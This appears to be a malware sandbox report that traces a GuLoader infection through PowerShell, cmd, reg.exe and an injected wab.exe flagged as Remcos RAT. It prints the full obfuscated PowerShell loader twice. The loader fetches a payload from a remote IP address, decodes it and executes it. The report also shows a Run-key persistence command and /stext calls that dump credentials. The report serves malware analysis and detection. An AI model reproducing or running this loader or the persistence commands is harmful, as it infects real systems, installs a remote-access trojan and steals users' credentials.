'Bundsn$FilologEnthral Strepo SpectbPannela SpeedlMat,ic: naffFRed,utoha.delr GenopeGrotonsrecondtLsessoi Soranl Demo l.onirriF,udernSyzygegTrstegsBugserkMaskinr Fras,e NoncodLnforssAnti he FamilnSy temeSp ndi= ,rawf$SkrmentForretrShellfu cullieLkkest ') ;Ordonnant $Conjuncts;Ordonnant (Andelskapitals ' friedSadidastA,stema .fblnrForslat Chelo- arbejSU,toadlVrdipaeDupliceSommerpTel.sk Vomere4Cit am ');Ordonnant (Andelskapitals 'Myelof$LogogrgVarliglAr ustoManropbKo,turaShinbol,orhip: LustiHBagslaaElbenmeunvitrmSploshoDil.ymrBemo lrUmaadehGesundaBa tergCathodiSmagstnL.banegBomben=Tvindc(St uthTHaa.cyeRecagis itemit Unsen-SwotteP AbdiaaSvibletFdeegnhgoloch Seders$Sande,SForsigp xpiraKhubbenS.rmeriRomanioHed.ril Oply,aTragedtunconteArgent)Beskyt ') ;Ordonnant (Andelskapitals ' omito$ S,ndegBudgetl Afk.ioBlkhatbG,yconaFlaekhl Nonm :Af.pndC Gremlhpostpalpoodeco metapr Udfr oElkomfhPackmay NaaeddBushelrL mineotermokc bernia megalrClimanbVel.rdo,ysternNemmen=microg$ ,ymphgUgrliglTwitcho.ichenbRes,rpa,ilslulStigm.:Ko torFFremhva Bri.lgDignifkVrd hfrUdmatriS akestNeophiiJouncek hemitkRash uevaabennHk,ene+Eutect+ nterd%Schill$JagheeBOmstniiPr,ikemOmgangiDepotelUpholsl Ballal OverdeHunknsn Pr.tonKlemteiHomoe.aGardeh.Patronc ElectoUnallouHepatanAlbe tt Br.dn ') ;$tamari=$Bimilllennia[$Chlorohydrocarbon];}Ordonnant (Andelskapitals 'Headsa$Kreditg VerdslLe.urioModifibOrthodaAloer.lOphold:MagicsUReprsepretsbesAvicull.edroniEvolvepSllesc Titan= Helin ,nepigGBagkldeBalsamtPerime- PyrarCDiagonoNoctamnPreetet ,ruseeTermosnS.hooltU dema Nordba$DendraS.otogrpof,iceaVaabe.necclesi BystaoEgnsp.lSelleraNonblit,lumuleBasset ');Ordonnant (Andelskapitals 'Phyllo$Ung,arg,fterblBowpotoRumfa b,ivildaMisbeslO erfi:MiseraHOzonedaIsengalEllevtaAlum.rlSavagiaNoniroh Fyrvrs Verge1Sheath4R,gnsk0Attrap Car,i= Lieno Stemme[ AcathSkarr eyMyop rs GratutUnmodieCoercimMorbro.ViksecCC,ddieoSeeweenCopyfiv ReduceOverthr Enight Vejov]Epi rh:Kaff,f:BawbeeFBountirOpsigeoSalvagmkvindeBUretfraSkbnegsOverkneReserv6 F.str4 C aneSTrsklet Flyg.rIndtryi.irginn Lor.cg Trnin(Foreta$ vertrUVansk p Jrnags Unco,l HaylaiConnubpaficio)underk ');Ordonnant (Andelskapitals ' Ug ns$ ChurlgBokserl Unoffo SubstbHarmonaSlavislNrings:Quint,KNeu,roaDigterrBefuldo Termi C,thin=Unlika Be mut[RacemoSBrusenyApokres Un.ertFordabeInterfmUnderk.NondamTMenueteFyrretxMolysbtCanich.SalonmEComplonHovedecZarniwoTransmdBezoariHomeotnEmpha,gSociol]In.ers: Avidi:LatineABlendeSTa,dhjCf tostI,olotoISm.ena.OplageGPolitieUnn tutpuristSPottietDramatrEpidemiTri.esn F,diggCurtes(.iguli$EnhaunHTildr aCyane,lJ,mfrua ,npaylSir psaDefensh LagersB.otek1 Nonre4Smitt.0Ic fal)Tilbud ');Ordonnant (Andelskapitals ' kivie$For,acgPegliklEnvoyeoDaaseab Skriga.odkanl Letfr:Jord,tESammmeuO,ersar ,ejreyBr.geraD likal No.tae inderaforhi.eForl g=Servic$cult.aK M.dulaStblokrReportoZonete.abattis RechauKi,dembH.percsLac imtschreirUnameniCyst,cnDorsivgo clus( Feltb3afs.ib2Oceano5Be,how8Catato0Dovens7Sympto, Knepp2Celleo9Pipist1Goersw2,ibbon0U.iver) ,oate ');Ordonnant $Euryaleae;"
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.2606411580.000002B7B8242000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:18:39:02
                                                                                          Start date:02/05/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:4
                                                                                          Start time:18:39:10
                                                                                          Start date:02/05/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $"
                                                                                          Imagebase:0x7ff717b90000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:5
                                                                                          Start time:18:39:15
                                                                                          Start date:02/05/2024
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvemRestpldStartk Borem./Exo ercAuturg reoler$slith,NCuadrioRugos,nTro.fleRib,onn GorsyvSat niiIntercoLsninguN klassUnbonn) Guin ');Ordonnant (Andelskapitals 'Bo,uso$ Flertg Ost alEksprooTonginb frankaWastlalSpartl:Re.dysBHookeri Progrm YashmiF avrilAfb,ndlCed,ellBas eteSengetnPar lenmand,aiAlvor.aKonver=Fl,wer$Persect O flyaAvisndmIdeanfa Domi,rTjenliiInsemi.ElektrsBy.gelpEnhv.rlRice ii BlodptAndroc( Pumic$ onoloUUn,scunFilteshJasperePate tsDelfitiJo,suntIndtegaAartietS.viori,pladevStartee DrudflHeapsoyG,tevr) Coa,n ');$tamari=$Bimilllennia[0];Ordonnant (Andelskapitals 'Solsik$Srgemag RaphalS gregoAgathibSol.ysaMatronlE broi: MisddA.evareuNonagerAls,diisyst mgNe.fourGela,iaLag inp Bulmeh kom,oyWhitel1.onoch6Me,rif8Civi i=.aacreNGlo,mieSub,arw B.spn-Zeal,dO R prib Kodifj UinaleAd ptec AgermtLedni, Haplo.S curmuyPre.stsSuperatVoldtaePe nagmAlogot.SharewNE emeneFestontKlapsa.UncameW Ngst,eSa.hedbD rgekCExorcilGener,i n wsleB.rricnOppebrtSp ndy ');Ordonnant (Andelskapitals 'Wistar$AnaeroA,ternouVandsprProaliiKuliltgBib iorAccumuaMaksimpLemu eh IntelySydame1Pec,or6Saddel8Reetab. FortsHCircumeTrin.ta icherdPicotieNonprorS epdasFuttoc[ Brand$V,dehaSTa.ientEksploadeklarsPindsve V,deor Bothl1Bygden1Pdofil2 ,osen].onero=Antine$ TirsdNSuffaroRulleknNedkomlForarmoUncircvStsydseSkurkerTryp,n ');$Conjuncts=Andelskapitals 'Dep avA tageuVrtdyrrStraffiManudug Fishbr limmeaVlessap St,rehVerdeny Unorm1Ablati6 Ur,ni8Uds ag.WopsboD UrbanoCerat,wEnshean BenzilMi.dstoGalilaaAdmiradPi.kawFFragmei.orstalSt,muleHooke.(Hydato$Cataget.verdnaPolyanmPre.iaatj.nebrPersoniGlobus,Hir in$s.ildpSBerappp radioaPornognudtrksiRhymero Stropl.ightsaDecentt.plevceRockla)Om.ind ';$Conjuncts=$baaskap[1]+$Conjuncts;$Spaniolate=$baaskap[0];Ordonnant (Andelskapitals 'Spi,el$Afbring Hy,anlBilligo,rejerb sliskaF.gsellAlloyt:OdilesHKulturaMa blyeFiskesmForedeoIntercrStoraarLets nh MandsaPhlebog I cini.opeienDu chygLoused= Colla(Form sTSkadegeV rslasAk,arit Humer- ManifPWallflaChondrtHadronh heter Untott$Parag SSymmetpraveliaC oplan Tilv,iHudgenoAnalg.l .anglaVaretat.useumeUncoor),nkelt ');while (!$Haemorrhaging) {Ordonnant (Andelskapitals 'Bundsn$FilologEnthral Strepo SpectbPannela SpeedlMat,ic: naffFRed,utoha.delr GenopeGrotonsrecondtLsessoi Soranl Demo l.onirriF,udernSyzygegTrstegsBugserkMaskinr Fras,e NoncodLnforssAnti he FamilnSy temeSp ndi= ,rawf$SkrmentForretrShellfu cullieLkkest ') ;Ordonnant $Conjuncts;Ordonnant (Andelskapitals ' friedSadidastA,stema .fblnrForslat Chelo- arbejSU,toadlVrdipaeDupliceSommerpTel.sk Vomere4Cit am ');Ordonnant (Andelskapitals 'Myelof$LogogrgVarliglAr ustoManropbKo,turaShinbol,orhip: LustiHBagslaaElbenmeunvitrmSploshoDil.ymrBemo lrUmaadehGesundaBa tergCathodiSmagstnL.banegBomben=Tvindc(St uthTHaa.cyeRecagis itemit Unsen-SwotteP AbdiaaSvibletFdeegnhgoloch Seders$Sande,SForsigp xpiraKhubbenS.rmeriRomanioHed.ril Oply,aTragedtunconteArgent)Beskyt ') ;Ordonnant (Andelskapitals ' omito$ S,ndegBudgetl Afk.ioBlkhatbG,yconaFlaekhl Nonm :Af.pndC Gremlhpostpalpoodeco metapr Udfr oElkomfhPackmay NaaeddBushelrL mineotermokc bernia megalrClimanbVel.rdo,ysternNemmen=microg$ ,ymphgUgrliglTwitcho.ichenbRes,rpa,ilslulStigm.:Ko torFFremhva Bri.lgDignifkVrd hfrUdmatriS akestNeophiiJouncek hemitkRash uevaabennHk,ene+Eutect+ nterd%Schill$JagheeBOmstniiPr,ikemOmgangiDepotelUpholsl Ballal OverdeHunknsn Pr.tonKlemteiHomoe.aGardeh.Patronc ElectoUnallouHepatanAlbe tt Br.dn ') ;$tamari=$Bimilllennia[$Chlorohydrocarbon];}Ordonnant (Andelskapitals 'Headsa$Kreditg VerdslLe.urioModifibOrthodaAloer.lOphold:MagicsUReprsepretsbesAvicull.edroniEvolvepSllesc Titan= Helin ,nepigGBagkldeBalsamtPerime- PyrarCDiagonoNoctamnPreetet ,ruseeTermosnS.hooltU dema Nordba$DendraS.otogrpof,iceaVaabe.necclesi BystaoEgnsp.lSelleraNonblit,lumuleBasset ');Ordonnant (Andelskapitals 'Phyllo$Ung,arg,fterblBowpotoRumfa b,ivildaMisbeslO erfi:MiseraHOzonedaIsengalEllevtaAlum.rlSavagiaNoniroh Fyrvrs Verge1Sheath4R,gnsk0Attrap Car,i= Lieno Stemme[ AcathSkarr eyMyop rs GratutUnmodieCoercimMorbro.ViksecCC,ddieoSeeweenCopyfiv ReduceOverthr Enight Vejov]Epi rh:Kaff,f:BawbeeFBountirOpsigeoSalvagmkvindeBUretfraSkbnegsOverkneReserv6 F.str4 C aneSTrsklet Flyg.rIndtryi.irginn Lor.cg Trnin(Foreta$ vertrUVansk p Jrnags Unco,l HaylaiConnubpaficio)underk ');Ordonnant (Andelskapitals ' Ug ns$ ChurlgBokserl Unoffo SubstbHarmonaSlavislNrings:Quint,KNeu,roaDigterrBefuldo Termi C,thin=Unlika Be mut[RacemoSBrusenyApokres Un.ertFordabeInterfmUnderk.NondamTMenueteFyrretxMolysbtCanich.SalonmEComplonHovedecZarniwoTransmdBezoariHomeotnEmpha,gSociol]In.ers: Avidi:LatineABlendeSTa,dhjCf tostI,olotoISm.ena.OplageGPolitieUnn tutpuristSPottietDramatrEpidemiTri.esn F,diggCurtes(.iguli$EnhaunHTildr aCyane,lJ,mfrua ,npaylSir psaDefensh LagersB.otek1 Nonre4Smitt.0Ic fal)Tilbud ');Ordonnant (Andelskapitals ' kivie$For,acgPegliklEnvoyeoDaaseab Skriga.odkanl Letfr:Jord,tESammmeuO,ersar ,ejreyBr.geraD likal No.tae inderaforhi.eForl g=Servic$cult.aK M.dulaStblokrReportoZonete.abattis RechauKi,dembH.percsLac imtschreirUnameniCyst,cnDorsivgo clus( Feltb3afs.ib2Oceano5Be,how8Catato0Dovens7Sympto, Knepp2Celleo9Pipist1Goersw2,ibbon0U.iver) ,oate ');Ordonnant $Euryaleae;"
                                                                                          Imagebase:0xfe0000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2331670219.0000000009450000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2320148012.0000000005A73000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2332047003.000000000A8C3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:8
                                                                                          Start time:18:39:19
                                                                                          Start date:02/05/2024
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $"
                                                                                          Imagebase:0x240000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:9
                                                                                          Start time:18:39:45
                                                                                          Start date:02/05/2024
                                                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                          Imagebase:0xb80000
                                                                                          File size:516'608 bytes
                                                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.2333650972.0000000006604000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          Target ID:10
                                                                                          Start time:18:39:53
                                                                                          Start date:02/05/2024
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"
                                                                                          Imagebase:0x240000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:11
                                                                                          Start time:18:39:53
                                                                                          Start date:02/05/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:12
                                                                                          Start time:18:39:54
                                                                                          Start date:02/05/2024
                                                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"
                                                                                          Imagebase:0x460000
                                                                                          File size:59'392 bytes
                                                                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:13
                                                                                          Start time:18:40:11
                                                                                          Start date:02/05/2024
                                                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\peqezcketotthbxautag"
                                                                                          Imagebase:0xb80000
                                                                                          File size:516'608 bytes
                                                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:14
                                                                                          Start time:18:40:11
                                                                                          Start date:02/05/2024
                                                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\aywoauvyhwlgrptelemijrt"
                                                                                          Imagebase:0xb80000
                                                                                          File size:516'608 bytes
                                                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:15
                                                                                          Start time:18:40:11
                                                                                          Start date:02/05/2024
                                                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cajhaffzuedltvhiuphbmeobpae"
                                                                                          Imagebase:0xb80000
                                                                                          File size:516'608 bytes
                                                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Reset < >
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2631898390.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_7ffd9baa0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 49667d3b75f3c16c59859fb3ab6cd6de7e3e65a152640aba521054ecfefedf8e
                                                                                            • Instruction ID: fa59be5a8681188763e34cc86298501b37dafbf7f7ab8941ea83119927037102
                                                                                            • Opcode Fuzzy Hash: 49667d3b75f3c16c59859fb3ab6cd6de7e3e65a152640aba521054ecfefedf8e
                                                                                            • Instruction Fuzzy Hash: 60F1A430A09A8D8FEBA8DF28CC557E937E1FF54310F04426EE85DC7295DB7899458B82
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2631898390.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_7ffd9baa0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9d4e4df59a44e437778360f2bcc7538f9bd84c355dbbc3dcfaaeee4088058f77
                                                                                            • Instruction ID: b9faf54c98a381abd0d7c887dc8e95419037ed58e37424620d833d86f8988866
                                                                                            • Opcode Fuzzy Hash: 9d4e4df59a44e437778360f2bcc7538f9bd84c355dbbc3dcfaaeee4088058f77
                                                                                            • Instruction Fuzzy Hash: BCE1B430A09A8E8FEBA8DF28C8557E977D2EF54310F14426ED88DC7295CE7499458B82
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2632794130.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_7ffd9bb70000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 68c7655bdf58241b8ad2a69b71960f10f51fff7120e0e69a48e782456f2e6c69
                                                                                            • Instruction ID: d9655e815a965bcffeeaafbf15891c69548b3d86232fff44a7709aa1251d53af
                                                                                            • Opcode Fuzzy Hash: 68c7655bdf58241b8ad2a69b71960f10f51fff7120e0e69a48e782456f2e6c69
                                                                                            • Instruction Fuzzy Hash: 7531F532B0E9494FFBA5EA9C94A1AB8B3D2EF59315F1401BEC08DC75D7DA15AC018351
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2632794130.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_7ffd9bb70000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7cdfe122ac3ae942eab3c6bb4e7a9ceeb4b69b3f5bcaa499a679c792ee5bf28f
                                                                                            • Instruction ID: 2120ab5e04d24b0def2655ebe1549cf0ba6ee1c0d844f8751d05e05c11c9cc29
                                                                                            • Opcode Fuzzy Hash: 7cdfe122ac3ae942eab3c6bb4e7a9ceeb4b69b3f5bcaa499a679c792ee5bf28f
                                                                                            • Instruction Fuzzy Hash: 1911E332B0EA498FF7A6EA9854A09BC67D1EF58315F5400BEC08DC75D3DA25AC018340
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2631898390.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_7ffd9baa0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                            • Instruction ID: bdda0109228a190c12742b9e7315728e2f6bb354b6803920c3f62299af715007
                                                                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                            • Instruction Fuzzy Hash: 9D01677121CB0C4FD748EF0CE451AA5B7E0FF95364F10056DE58AC76A5D636E881CB45
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2325323924.0000000008010000.00000040.00000800.00020000.00000000.sdmp, Offset: 08010000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_8010000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: \V`j
                                                                                            • API String ID: 0-3464933
                                                                                            • Opcode ID: 8b5b4ddefed0af251cc6b32fc68f6f12080f4f24ecbe85cd61a80c92470485ae
                                                                                            • Instruction ID: 53e1490d6e2bfc318d4cf706153c57aa00c8eeb312d830cdd800e33e619d89b3
                                                                                            • Opcode Fuzzy Hash: 8b5b4ddefed0af251cc6b32fc68f6f12080f4f24ecbe85cd61a80c92470485ae
                                                                                            • Instruction Fuzzy Hash: 9FB14C70E00209CFDF58CFA9D88579EFBF2BF88325F149129D515A7294EB749846CB81
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2325323924.0000000008010000.00000040.00000800.00020000.00000000.sdmp, Offset: 08010000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_8010000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f8657c8b86b7904158ac31ad736127fd393e739f592a1bfb945ca127d02c2fad
                                                                                            • Instruction ID: 5776bdd054a3c72bcef79df03bbdebe257f7db2c177bf69ae7515ad708cadd6e
                                                                                            • Opcode Fuzzy Hash: f8657c8b86b7904158ac31ad736127fd393e739f592a1bfb945ca127d02c2fad
                                                                                            • Instruction Fuzzy Hash: ADB17F70E00209CFDF58CFA9D8817ADBBF3AF88325F149529D515E7294EB749886CB81
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
